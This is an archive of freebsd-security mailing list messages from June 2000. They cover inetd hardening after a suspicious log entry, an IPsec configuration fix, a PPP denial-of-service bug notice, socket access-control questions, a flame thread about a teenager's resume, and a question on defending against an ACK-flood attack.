Try "man hosts.allow" or "man hosts_access" (not at a FreeBSD box right now, so can't check.)

Anyway, you can use "netstat -n -a" to find out what ports you have open.

Troy

> Hi all!
>
> Today I saw this in messages:
> Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534
> Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534
>
> I checked all the logs -- there was no login via telnet or ssh. No activity was detected for that period of time on my http or ftp daemons. So I suppose that it was through one of the predefined inetd services.
>
> Here are my inetd.conf's enabled nodes:
>
> ftp     stream  tcp     nowait  root    /usr/local/sbin/proftpd proftpd
> telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
> shell   stream  tcp     nowait  root    /usr/libexec/rshd       rshd
> login   stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
> finger  stream  tcp     nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
> comsat  dgram   udp     wait    tty:tty /usr/libexec/comsat     comsat
> ntalk   dgram   udp     wait    tty:tty /usr/libexec/ntalkd     ntalkd
>
> #
> # IPv6 services
> #
> ftp     stream  tcp6    nowait  root    /usr/local/sbin/proftpd proftpd
> telnet  stream  tcp6    nowait  root    /usr/libexec/telnetd    telnetd
> shell   stream  tcp6    nowait  root    /usr/libexec/rshd       rshd
> login   stream  tcp6    nowait  root    /usr/libexec/rlogind    rlogind
> finger  stream  tcp6    nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
>
> The question is: which of these daemons can be disabled (or even inetd itself) without any harm? I have no use for NFS -- plain http/ftp/pop server. SMTP and POP stuff is already handled by tcpserv.
>
> I've already set up hosts.allow: denied any without reverse DNS, allowed any ftp, portmap, and ssh; denied all other daemons/users except trusted addresses.
> Where can I find out additional info about hosts.allow syntax?
>
> Thanks in advance.
From owner-freebsd-security Mon Jun 19 7:07:01 2000
From: Bart van Leeuwen <bart@ixori.demon.nl>
To: Oleg Strizhak
Cc: FreeBSD-security
Subject: Re: tried to be cracked
Date: Mon, 19 Jun 2000 16:10:56 +0200 (CEST)
In-Reply-To: <002b01bfd9f1$03fb2680$a4df36c3@Inforser.Ru>

First of all I'd suspect something weird happened on that machine, tho not a hack attempt per se. (it might be)

You could prolly do without telnet, rshd, rlogind and finger, and ntalk and comsat are also not required unless you use shell accounts, in which case they are more handy than required. If I don't need it, I prefer disabling inetd entirely.

I'd suggest at least using ssh instead of rsh/telnet for shell access. (comes with 4.0, or use openssh or ssh from the ports collection) This will allow for stronger authentication for shell logins, it will encrypt the session, and it can be set up such that only RSA based authentication will allow someone in (which means your password is never sent over the net at all).

This does require your clients to be secure enough, but that should be a requirement anyway, else a client from someone who has privileges on your machine is a very easy way in.

For the rest it is good to close things a bit with wrappers, but I'd prolly check out ipf or ipfw for such things because it keeps away unwanted traffic at a bit lower level ;-) (combining both can work well, and how you should do this is, as far as I can see, a matter of belief ;-)

It might also be a nice idea to run your ftpd in a chrooted or jailed environment if that is possible with your kind of usage. Esp. running in a jail might prevent losing system trust when your ftpd gets compromised. (note that if your system is indeed compromised right now, it would be a very good idea to at least check each and every file on it for modification in case the intruder left some form of backdoor or other malicious code or configuration, so you cannot trust your system right now)

A problem here is that if your system is compromised, an intruder is quite likely to edit out entries related to the intrusion from your log files. Because of this it might be a good idea to log to a different machine. This might allow an intruder to introduce extra logging information, but will make it very hard if not impossible to remove logging data.

Another thing to do is to enable process accounting; it can help you track what happened here.

Last but not least, install and run some IDS software (snort from the ports collection might be a good choice) that is able to keep track of unusual or known malicious activity and can generate alerts based on what it sees.

man init and man security are the first 2 places to look for information. In case you did not find that part, man hosts_options explains the syntax of the hosts.allow file.

Bart van Leeuwen
-----------------------------------------------------------
mailto:bart@ixori.demon.nl - http://www.ixori.demon.nl/
-----------------------------------------------------------

On Mon, 19 Jun 2000, Oleg Strizhak wrote:

> Hi all!
>
> Today I saw this in messages:
> Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534
> Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534
>
> I checked all the logs -- there was no login via telnet or ssh. No activity was detected for that period of time on my http or ftp daemons. So I suppose that it was through one of the predefined inetd services.
>
> Here are my inetd.conf's enabled nodes:
>
> ftp     stream  tcp     nowait  root    /usr/local/sbin/proftpd proftpd
> telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
> shell   stream  tcp     nowait  root    /usr/libexec/rshd       rshd
> login   stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
> finger  stream  tcp     nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
> comsat  dgram   udp     wait    tty:tty /usr/libexec/comsat     comsat
> ntalk   dgram   udp     wait    tty:tty /usr/libexec/ntalkd     ntalkd
>
> #
> # IPv6 services
> #
> ftp     stream  tcp6    nowait  root    /usr/local/sbin/proftpd proftpd
> telnet  stream  tcp6    nowait  root    /usr/libexec/telnetd    telnetd
> shell   stream  tcp6    nowait  root    /usr/libexec/rshd       rshd
> login   stream  tcp6    nowait  root    /usr/libexec/rlogind    rlogind
> finger  stream  tcp6    nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
>
> The question is: which of these daemons can be disabled (or even inetd itself) without any harm? I have no use for NFS -- plain http/ftp/pop server. SMTP and POP stuff is already handled by tcpserv.
>
> I've already set up hosts.allow: denied any without reverse DNS, allowed any ftp, portmap, and ssh; denied all other daemons/users except trusted addresses.
> Where can I find out additional info about hosts.allow syntax?
>
> Thanks in advance.
From owner-freebsd-security Mon Jun 19 7:09:11 2000
From: Bart van Leeuwen <bart@ixori.demon.nl>
To: "tjk@tksoft.com"
Cc: Oleg Strizhak, FreeBSD-security@freebsd.org
Subject: Re: tried to be cracked
Date: Mon, 19 Jun 2000 16:13:23 +0200 (CEST)
In-Reply-To: <200006191351.GAA07969@uno.tksoft.com>

To add to that, on 4.0 it seems to be man hosts_options for info on the hosts.allow file.

Another very useful command to look at is sockstat (-an); it will tell you which 'command' is actually listening to which port on your machine.

Bart van Leeuwen
-----------------------------------------------------------
mailto:bart@ixori.demon.nl - http://www.ixori.demon.nl/
-----------------------------------------------------------

On Mon, 19 Jun 2000, tjk@tksoft.com wrote:

> You don't need any service you don't know about.
>
> You can disable all of them, except ftp and telnet, if
> you use telnet. You should also not have any daemons
> running which you don't use: mountd, nfsd, portmap, etc.
>
> Try
> "man hosts.allow" or "man hosts_access"
> (not at a FreeBSD box right now, so can't check.)
>
> Anyway, you can use "netstat -n -a" to find out what
> ports you have open.
>
> Troy
>
> > Hi all!
> >
> > Today I saw this in messages:
> > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534
> > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534
> >
> > I checked all the logs -- there was no login via telnet or ssh. No activity was detected for that period of time on my http or ftp daemons. So I suppose that it was through one of the predefined inetd services.
> >
> > Here are my inetd.conf's enabled nodes:
> >
> > ftp     stream  tcp     nowait  root    /usr/local/sbin/proftpd proftpd
> > telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
> > shell   stream  tcp     nowait  root    /usr/libexec/rshd       rshd
> > login   stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
> > finger  stream  tcp     nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
> > comsat  dgram   udp     wait    tty:tty /usr/libexec/comsat     comsat
> > ntalk   dgram   udp     wait    tty:tty /usr/libexec/ntalkd     ntalkd
> >
> > #
> > # IPv6 services
> > #
> > ftp     stream  tcp6    nowait  root    /usr/local/sbin/proftpd proftpd
> > telnet  stream  tcp6    nowait  root    /usr/libexec/telnetd    telnetd
> > shell   stream  tcp6    nowait  root    /usr/libexec/rshd       rshd
> > login   stream  tcp6    nowait  root    /usr/libexec/rlogind    rlogind
> > finger  stream  tcp6    nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
> >
> > The question is: which of these daemons can be disabled (or even inetd itself) without any harm? I have no use for NFS -- plain http/ftp/pop server. SMTP and POP stuff is already handled by tcpserv.
> >
> > I've already set up hosts.allow: denied any without reverse DNS, allowed any ftp, portmap, and ssh; denied all other daemons/users except trusted addresses.
> > Where can I find out additional info about hosts.allow syntax?
> >
> > Thanks in advance.

From owner-freebsd-security Mon Jun 19 11:35:07 2000
From: ARIGA Seiji <say@sfc.wide.ad.jp>
To: gronimw@stuy.edu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Ipsec misconfiguration problem
Date: Tue, 20 Jun 2000 03:34:33 +0900
Message-Id: <20000620033433M.say@decoy.sfc.keio.ac.jp>
In-Reply-To: <20000619004802.A1461@spike.brainlink.com>
X-PGP-Publickey: http://decoy.sfc.keio.ac.jp/~say/key.txt
X-PGP-Fingerprint: 8E 70 AB 20 44 E6 8A 8A 1C 49 B3 30 44 1B B3 BA

Hi,

First of all, I assume that you are using FreeBSD 4.0-RELEASE.

On Mon, 19 Jun 2000 00:48:02 -0400, Spike Gronim wrote,
: I tried a lot of things, and then copied the NetBSD documentation setup
: (http://www.netbsd.org/Documentation/network/ipsec/#sample_esp)
:
IPsec functions are based on KAME (http://www.kame.net) code.
FreeBSD 4.0 is based on old KAME code, though NetBSD merged very recent code. So, IPsec configuration is a bit different between these OSes.

: [ipsec.conf]
: add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge";
: add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga";
: add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge";
: add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga";
: spdadd 192.168.0.1 192.168.0.200 any -P out\
:     ipsec esp/transport//use ah/transport//use;
: [ipsec.conf]

Try this,

on 192.168.0.1,

add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge";
add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga";
add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge";
add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga";
spdadd 192.168.0.1 192.168.0.200 any -P out ipsec
    esp/transport/192.168.0.1-192.168.0.200/use
    ah/transport/192.168.0.1-192.168.0.200/use;

on 192.168.0.200

add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge";
add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga";
add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge";
add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga";
spdadd 192.168.0.200 192.168.0.1 any -P out ipsec
    esp/transport/192.168.0.200-192.168.0.1/use
    ah/transport/192.168.0.200-192.168.0.1/use;

As you see, you have to swap the IP addresses only for spdadd.
# I think it is because both nodes have to share the same SA configuration.

And also you have to add "src-dst" for spd.

// ARIGA Seiji

From owner-freebsd-security Mon Jun 19 13:57:34 2000
From: Kris Kennaway <kris@FreeBSD.org>
To: security@Freebsd.org
Subject: Dinner at Usenix on Tuesday
Date: Mon, 19 Jun 2000 13:57:30 -0700 (PDT)

For those of you who are going to be around at Usenix on Tuesday evening, and who have an interest in FreeBSD security matters (or just want to go out for dinner), Robert Watson and I and one or two others were planning to get together to chat about such things. No definite plans yet, but Robert tells me he's planning to be hanging around in the lobby possibly wearing a TrustedBSD T-Shirt, and I'll most likely be in the terminal room :-)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Tue Jun 20 2:52:40 2000
From: Adrian Penisoara <ady@warpnet.ro>
To: freebsd-isp@FreeBSD.ORG
Cc: freebsd-security@FreeBSD.ORG, tech@OpenBSD.org, Brian Somers
Subject: ATTN: FIX for PPP with >9 tunnels / possible DoS
Date: Tue, 20 Jun 2000 13:00:10 +0300 (EEST)

Hi,

Whoever uses userland PPP with more than 9 tunnel devices compiled in kernel should be updating to the latest (post 2000/06/19) sources, a bug which was affecting route deletion handling has just been committed.

What is it all about: at startup PPP was getting a wrong interface index number in the routing table and upon termination it was deleting routes for the wrong tunnel interface. Evil users may exploit this in that they can block those PPP links which use the first tunnel interfaces.

For more details please check out PR #19384 ( http://www.freebsd.org/cgi/query-pr.cgi?pr=19384 ); please do not use the patch suggested in the PR, better use the version committed in the CVS tree which is optimised.

*All* FreeBSD branches are affected; the fix has been committed for 3-stable, 4-stable and 5-current branches. I CC'ed OpenBSD's technical mailing list because they are using the same source package and might be affected (?).

Thanks,
Adrian Penisoara
Ady (@freebsd.ady.ro)

From owner-freebsd-security Tue Jun 20 4:23:22 2000
From: Brian Somers <brian@Awfulhak.org>
To: Adrian Penisoara
Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, tech@OpenBSD.org, Brian Somers, brian@hak.lan.Awfulhak.org
Subject: Re: ATTN: FIX for PPP with >9 tunnels / possible DoS
Date: Tue, 20 Jun 2000 12:08:29 +0100
Message-Id: <200006201108.MAA60668@hak.lan.Awfulhak.org>
In-Reply-To: Message from Adrian Penisoara of "Tue, 20 Jun 2000 13:00:10 +0300."

[.....]
> *All* FreeBSD branches are affected; the fix has been committed for
> 3-stable, 4-stable and 5-current branches. I CC'ed OpenBSD's technical
> mailing list because they are using the same source package and might be
> affected (?).

The fix was committed to OpenBSD too.

> Thanks,
> Adrian Penisoara
> Ady (@freebsd.ady.ro)

--
Brian

Don't _EVER_ lose your sense of humour !
From owner-freebsd-security Tue Jun 20 6:31:48 2000
From: Chris Williams <chris.williams@third-rail.net>
To: freebsd-security@FreeBSD.ORG
Subject: Speaking of PPP..
Date: Tue, 20 Jun 2000 09:28:40 -0400
Message-ID: <394F7188.D790BDBF@third-rail.net>

Does anyone know a way of doing pass-through authentication to an NT domain controller for MSCHAP PPP authentication on a BSD box?

From owner-freebsd-security Tue Jun 20 8:36:26 2000
From: Brian Somers <brian@Awfulhak.org>
To: Chris Williams
Cc: freebsd-security@FreeBSD.ORG, brian@hak.lan.Awfulhak.org
Subject: Re: Speaking of PPP..
Date: Tue, 20 Jun 2000 16:35:03 +0100
Message-Id: <200006201535.QAA62868@hak.lan.Awfulhak.org>
In-Reply-To: Message from Chris Williams of "Tue, 20 Jun 2000 09:28:40 EDT." <394F7188.D790BDBF@third-rail.net>

> Does anyone know a way of doing pass-through authentication to an NT
> domain controller for MSCHAP PPP authentication on a BSD box?

The only thing like this that ppp can do at the moment is radius authentication.

I think the cleanest way to tackle it would be to implement a PAM module to do the NT bit and then teach ppp to do PAM. I have the ppp/PAM bit on my todo list, but it's been there for a long time :-/

--
Brian

Don't _EVER_ lose your sense of humour !
From owner-freebsd-security Tue Jun 20 12:06:36 2000
From: "Duncan de Verteuil" <info@direct-internet.net>
To: freebsd-isp@freebsd.org, freebsd-security@freebsd.org
Cc: ripley@nostromo.in-berlin.de
Subject: Re: Resume...
Date: Tue, 20 Jun 2000 14:42:28 -0400
Message-ID: <00dc01bfdae7$499eaee0$20c1f5cf@directinternet.net>
References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> <20000618031620.B3840@server.nostromo.in-berlin.de>

----- Original Message -----
From: H. Eckert
Sent: Saturday, June 17, 2000 9:16 PM
Subject: Re: Resume...

> Quoting Jason L. Schwab (jlschwab@uswest.net):
> > X-Mailer: Microsoft Outlook Express 5.00.2615.200
> > I am 17 years of age.
> > I consider my self a professional unix system administrator.
>
> Consider yourself lucky to be qualified to admin a microwave
> at a fastfood restaurant. This might even help you to get a
> chance to get a real qualification in the near future.
>
> Greetings,
> Ripley

Aren't YOU one arrogant piece of... *shakes head*
I am disgusted.

From owner-freebsd-security Tue Jun 20 13:12:58 2000
From: George.Giles@mcmail.vanderbilt.edu
To: freebsd-security@freebsd.org
Subject: Re: Resume...
Date: Tue, 20 Jun 2000 15:10:19 -0500
Message-ID: <86256904.006E24B6.00@MCSMTP.MC.VANDERBILT.EDU>

Arrogance is a Prussian characteristic that has caused much misery over the years.

A wise old saying comes to mind:

"Better to be thought a fool, than to open your mouth and remove all doubt."

On 06/20/00 01:42 PM, "Duncan de Verteuil" <info@direct-internet.net> wrote
(To: freebsd-isp@freebsd.org, freebsd-security@freebsd.org; cc: ripley@nostromo.in-berlin.de, bcc: George Giles/VUMC/Vanderbilt; Subject: Re: Resume...):

----- Original Message -----
From: H. Eckert
Sent: Saturday, June 17, 2000 9:16 PM
Subject: Re: Resume...

> Quoting Jason L. Schwab (jlschwab@uswest.net):
> > X-Mailer: Microsoft Outlook Express 5.00.2615.200
> > I am 17 years of age.
> > I consider my self a professional unix system administrator.
>
> Consider yourself lucky to be qualified to admin a microwave
> at a fastfood restaurant. This might even help you to get a
> chance to get a real qualification in the near future.
>
> Greetings,
> Ripley

Aren't YOU one arrogant piece of... *shakes head*
I am disgusted.

From owner-freebsd-security Tue Jun 20 13:23:11 2000
From: "Duncan de Verteuil" <info@direct-internet.net>
Subject: Re: Resume...
Date: Tue, 20 Jun 2000 16:13:19 -0400
Message-ID: <000d01bfdaf3$fa7457e0$20c1f5cf@directinternet.net>
References: <86256904.006E24B6.00@MCSMTP.MC.VANDERBILT.EDU>

Bravo! It is very appropriate. My hat's off to you!

Duncan de Verteuil

> Arrogance is a Prussian characteristic that has caused much misery over the
> years.
>
> A wise old saying comes to mind:
>
> "Better to be thought a fool, than to open your mouth and remove all doubt."
> > > > |--------+--------------------------> > | | "Duncan de | > | | Verteuil" | > | | | | ernet.net> | > | | | > | | 06/20/00 01:42 | > | | PM | > | | | > |--------+--------------------------> > >------------------------------------------------------| > | | > | To: freebsd-isp@freebsd.org, | > | freebsd-security@freebsd.org | > | cc: ripley@nostromo.in-berlin.de, (bcc: | > | George Giles/VUMC/Vanderbilt) | > | Subject: Re: Resume... | > >------------------------------------------------------| > > > > > ----- Original Message ----- > From: H. Eckert > To: ; > Cc: > Sent: Saturday, June 17, 2000 9:16 PM > Subject: Re: Resume... > > > > Quoting Jason L. Schwab (jlschwab@uswest.net): > > > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > > > I am 17 years of age. > > > I consider my self a professional unix system administrator. > > > > Consider yourself lucky to be qualified to admin a microwave > > at a fastfood restaurant. This might even help you to get a > > chance to get a real qualification in the near future. > > > > Greetings, > > Ripley > > > > > Aren't YOU one arrogant piece of... *shakes head* > I am disgusted. 

From owner-freebsd-security Tue Jun 20 15:37:53 2000
From: James Howard
To: freebsd-security@freebsd.org
Subject: Network ACLs
Date: Tue, 20 Jun 2000 18:37:42 -0400
Message-Id: <200006202237.SAA20291@rac10.wam.umd.edu>

I know that the TrustedBSD group is working on filesystem ACLs. Will
something similar be extended to the socket interface?
Thanks, Jamie

From owner-freebsd-security Tue Jun 20 15:49:06 2000
From: Andrew Reiter
To: James Howard
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Network ACLs
Date: Tue, 20 Jun 2000 18:48:28 -0400 (EDT)
In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu>

Imo, it's not too difficult to add ACLs via a kernel hack or via a KLD and
then setting a higher securelevel. The socket syscall gets passed a struct
proc *p [like all other syscalls], and therefore one can check uid, euid,
etc etc etc... and do a hack in this manner.

Andrew

On Tue, 20 Jun 2000, James Howard wrote:

|I know that the TrustedBSD group is working on filesystem ACLs. Will
|something similar be extended to the socket interface?
|
|Thanks, Jamie

---------------------------------------------------------
Andrew Reiter
Computer Security Engineer

From owner-freebsd-security Tue Jun 20 16:30:46 2000
From: "Ilmar S. Habibulin"
To: James Howard
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Network ACLs
Date: Wed, 21 Jun 2000 03:30:24 +0400 (MSD)
In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu>

On Tue, 20 Jun 2000, James Howard wrote:

> I know that the TrustedBSD group is working on filesystem ACLs. Will
> something similar be extended to the socket interface?

And what do you want to do with sockets? Something similar to packet
filtering based on uids, or do you want to control access to socket
functions?

From owner-freebsd-security Tue Jun 20 17:37:32 2000
From: Joe Barnhart
To: Duncan de Verteuil
Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Resume...
Date: Tue, 20 Jun 2000 20:37:18 -0400 (EDT)
In-Reply-To: <00dc01bfdae7$499eaee0$20c1f5cf@directinternet.net>

And people wonder why linux is getting so much more...it might just be
because of the *attitudes* on the *bsd lists...

This is but one of so many I have saved showing nothing but contempt for
people. Oh well, keep being sound blaster compatible...you know, having
support for linux apps instead of attracting the companies to write a
direct port for you.

Pitiful.

JB

On Tue, 20 Jun 2000, Duncan de Verteuil wrote:

> ----- Original Message -----
> From: H. Eckert
> Sent: Saturday, June 17, 2000 9:16 PM
> Subject: Re: Resume...
>
> > Quoting Jason L. Schwab (jlschwab@uswest.net):
> > > X-Mailer: Microsoft Outlook Express 5.00.2615.200
> > > I am 17 years of age.
> > > I consider myself a professional unix system administrator.
> >
> > Consider yourself lucky to be qualified to admin a microwave
> > at a fastfood restaurant. This might even help you to get a
> > chance to get a real qualification in the near future.
> >
> > Greetings,
> > Ripley
>
> Aren't YOU one arrogant piece of... *shakes head*
> I am disgusted.

From owner-freebsd-security Tue Jun 20 17:43:26 2000
From: "f.johan.beisser"
To: Joe Barnhart
Cc: Duncan de Verteuil, freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Resume...
Date: Tue, 20 Jun 2000 17:43:13 -0700 (PDT)

because i'm wading through this, i think i'll be nice, and ask you folks
to move this to -chat, or possibly off the lists altogether.

thanks much.

-- jan

On Tue, 20 Jun 2000, Joe Barnhart wrote:

> And people wonder why linux is getting so much more...it might just be
> because of the *attitudes* on the *bsd lists...
>
> This is but one of so many I have saved showing nothing but contempt for
> people. Oh well, keep being sound blaster compatible...you know, having
> support for linux apps instead of attracting the companies to write a
> direct port for you.
>
> Pitiful.
>
> JB
>
> On Tue, 20 Jun 2000, Duncan de Verteuil wrote:
>
> > ----- Original Message -----
> > From: H. Eckert
> > Sent: Saturday, June 17, 2000 9:16 PM
> > Subject: Re: Resume...
> >
> > > Quoting Jason L. Schwab (jlschwab@uswest.net):
> > > > X-Mailer: Microsoft Outlook Express 5.00.2615.200
> > > > I am 17 years of age.
> > > > I consider myself a professional unix system administrator.
> > >
> > > Consider yourself lucky to be qualified to admin a microwave
> > > at a fastfood restaurant. This might even help you to get a
> > > chance to get a real qualification in the near future.
> > >
> > > Greetings,
> > > Ripley
> >
> > Aren't YOU one arrogant piece of... *shakes head*
> > I am disgusted.

+-----/ f. johan beisser /------------------------------+
  email: jan[at]caustic.org   web: http://www.caustic.org/~jan
  "knowledge is power. power corrupts. study hard, be evil."

From owner-freebsd-security Tue Jun 20 17:52:14 2000
From: Joe Barnhart
To: XuYifeng
Cc: Duncan de Verteuil, freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Resume...
Date: Tue, 20 Jun 2000 20:51:54 -0400 (EDT)
In-Reply-To: <000701bfdb1a$3c1b54c0$1701a8c0@xu>

I agree. I'm so sad to see, however, replies to people that are so much
less than professional (not that we have to necessarily be such all the
time). I'm convinced that some of the problem is attitudes and the
unwillingness to be open and help.
People move and go to communities that they feel better being a part of.
I can only wonder how many people we have lost here to linux that might
have asked a question and ended up being treated like sh**. Hey, it won't
happen but once to me, and I run an ISP with a wide variety of OS's.
Nothing is very warm here, nor on the BSDI lists either. It's hurting the
entire community; just sub to some of the linux lists and see for yourself
how the help flows. It made it commercial, it started early and earned
itself a rep for cooperation, not spitefulness.

JB

On Wed, 21 Jun 2000, XuYifeng wrote:

> don't try to change somebody's attitudes in bsd lists, it's too
> difficult :(
> also, I admit bsd has better technology, but Linux is more commercial.
> BSD's very important problem is there isn't any enterprise level
> database system, it's a pain.
>
> XuYifeng
>
> ----- Original Message -----
> From: "Joe Barnhart"
> To: "Duncan de Verteuil"
> Sent: Wednesday, June 21, 2000 8:37 AM
> Subject: Re: Resume...
>
> > And people wonder why linux is getting so much more...it might just be
> > because of the *attitudes* on the *bsd lists...
> >
> > This is but one of so many I have saved showing nothing but contempt for
> > people. Oh well, keep being sound blaster compatible...you know, having
> > support for linux apps instead of attracting the companies to write a
> > direct port for you.
> >
> > Pitiful.
> >
> > JB
> >
> > On Tue, 20 Jun 2000, Duncan de Verteuil wrote:
> >
> > > ----- Original Message -----
> > > From: H. Eckert
> > > Sent: Saturday, June 17, 2000 9:16 PM
> > > Subject: Re: Resume...
> > >
> > > > Quoting Jason L. Schwab (jlschwab@uswest.net):
> > > > > X-Mailer: Microsoft Outlook Express 5.00.2615.200
> > > > > I am 17 years of age.
> > > > > I consider myself a professional unix system administrator.
> > > > >
> > > > Consider yourself lucky to be qualified to admin a microwave
> > > > at a fastfood restaurant. This might even help you to get a
> > > > chance to get a real qualification in the near future.
> > > >
> > > > Greetings,
> > > > Ripley
> > >
> > > Aren't YOU one arrogant piece of... *shakes head*
> > > I am disgusted.

/---------------------------- 352-372-5100 -------------------------------\
| Joseph Barnhart           | IRC         | Gainesville, Tallahassee,     |
| FDT Network Administrator | Front Page  | Ocala, Tampa & St. Pete.      |
| Florida Digital Turnpike  | 56k Dialup  | Pensacola, Jacksonville and   |
| http://www.fdt.net        | ISDN T1     | Miami. Megapop and Ipass      |
| joseph.barnhart@fdt.net   | Web Hosting | National access.              |
|                           | Unix Shells |                               |
\---------------------------- 850-222-5200 -------------------------------/

From owner-freebsd-security Tue Jun 20 18:04:52 2000
From: "f.johan.beisser"
To: James Howard
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Network ACLs
Date: Tue, 20 Jun 2000 18:04:59 -0700 (PDT)
In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu>

on freebsd-ipfw there's a thread about UID controls, which may interest
you, and may be related to this. there's a set patch for testing, which
i've not had a chance to try out just yet.

On Tue, 20 Jun 2000, James Howard wrote:

> I know that the TrustedBSD group is working on filesystem ACLs. Will
> something similar be extended to the socket interface?
>
> Thanks, Jamie

+-----/ f. johan beisser /------------------------------+
  email: jan[at]caustic.org   web: http://www.caustic.org/~jan
  "knowledge is power. power corrupts. study hard, be evil."

From owner-freebsd-security Tue Jun 20 18:04:54 2000
From: James Howard
To: "Ilmar S. Habibulin"
Cc: freebsd-security@freebsd.org
Subject: Re: Network ACLs
Date: Tue, 20 Jun 2000 21:04:39 -0400
Message-Id: <200006210104.VAA07282@rac6.wam.umd.edu>
In-reply-to: Your message of "Wed, 21 Jun 2000 03:30:24 +0400."

In message, "Ilmar S. Habibulin" writes:

> And what do you want to do with sockets? Something similar to packet
> filtering based on uids or you want to control access to socket functions?

I want to be able to create a group called "inet" and anyone who is a
member of that group may open connections. However, they may not
listen. Root can do anything he/she wants. Nobody else can do anything.

I run a freenet and I want to limit outgoing connections to paying users.
Jamie

From owner-freebsd-security Tue Jun 20 18:30:12 2000
From: Kris Kennaway
To: James Howard
Cc: "Ilmar S. Habibulin", freebsd-security@freebsd.org
Subject: Re: Network ACLs
Date: Tue, 20 Jun 2000 18:30:08 -0700 (PDT)
In-Reply-To: <200006210104.VAA07282@rac6.wam.umd.edu>

On Tue, 20 Jun 2000, James Howard wrote:

> I want to be able to create a group called "inet" and anyone who is a
> member of that group may open connections. However, they may not
> listen. Root can do anything he/she wants. Nobody else can do anything.

ipfw can filter based on uid and gid

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Tue Jun 20 22:17:09 2000
From: James Bailie
To: freebsd-security@FreeBSD.ORG
Subject: Re: Resume...
Date: Wed, 21 Jun 2000 01:16:59 -0400
Message-ID: <20000621011659.A56241@cr31617-a.lndn1.on.wave.home.co>
In-Reply-To: <86256904.006E24B6.00@MCSMTP.MC.VANDERBILT.EDU>; from George.Giles@mcmail.vanderbilt.edu on Tue, Jun 20, 2000 at 03:10:19PM -0500

On Tue, Jun 20, 2000 at 03:10:19PM -0500, George.Giles@mcmail.vanderbilt.edu wrote:

> Arrogance is a Prussian characteristic, that has caused much misery over the
> years.

I guess you were never a teenager! Being a plucky young turk, bragging,
exaggerating your hacking accomplishments is tantamount to Prussian
authoritarianism/militarism? Har! This kid, if he has the brains and
industry to match his passion, might go further than any of us. Hell,
knowledge of HTML and a bit-o-Perl has made more than one teenage
millionaire in my hometown.
--
James Bailie
http://jazzturkey.net/

From owner-freebsd-security Tue Jun 20 23:27:50 2000
From: "Adrian Portelli"
Subject:
Date: Wed, 21 Jun 2000 16:30:50 +1000
Message-ID: <037e01bfdb4a$3ec405c0$e2308490@prodigy>

auth 09386373 unsubscribe freebsd-security adriangp@ozemail.com.au

From owner-freebsd-security Wed Jun 21 00:20:13 2000
From: "Ilmar S. Habibulin"
To: James Howard
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Network ACLs
Date: Wed, 21 Jun 2000 11:19:48 +0400 (MSD)
In-Reply-To: <200006210104.VAA07282@rac6.wam.umd.edu>

On Tue, 20 Jun 2000, James Howard wrote:

> I want to be able to create a group called "inet" and anyone who is a
> member of that group may open connections. However, they may not
> listen. Root can do anything he/she wants. Nobody else can do anything.

Well, then you need POSIX capabilities plus the file ACLs of TrustedBSD,
if you are interested in TrustedBSD features. But they are not fully
implemented right now. To solve your problem you can follow the advice to
use ipfw's uid/gid filtering option, because TrustedBSD is far from being
finished.

From owner-freebsd-security Wed Jun 21 02:37:04 2000
From: "Maksimov Maksim"
Subject: How defend from stream2.c attack?
Date: Wed, 21 Jun 2000 17:36:57 +0800
Message-ID: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su>

How do I defend from a stream2.c attack (flooding ACK packets) on my FreeBSD
box? I installed FreeBSD 4.0-20000608-STABLE, but the stream2.c attack froze
this FreeBSD box as before!
Help!

Best regards,
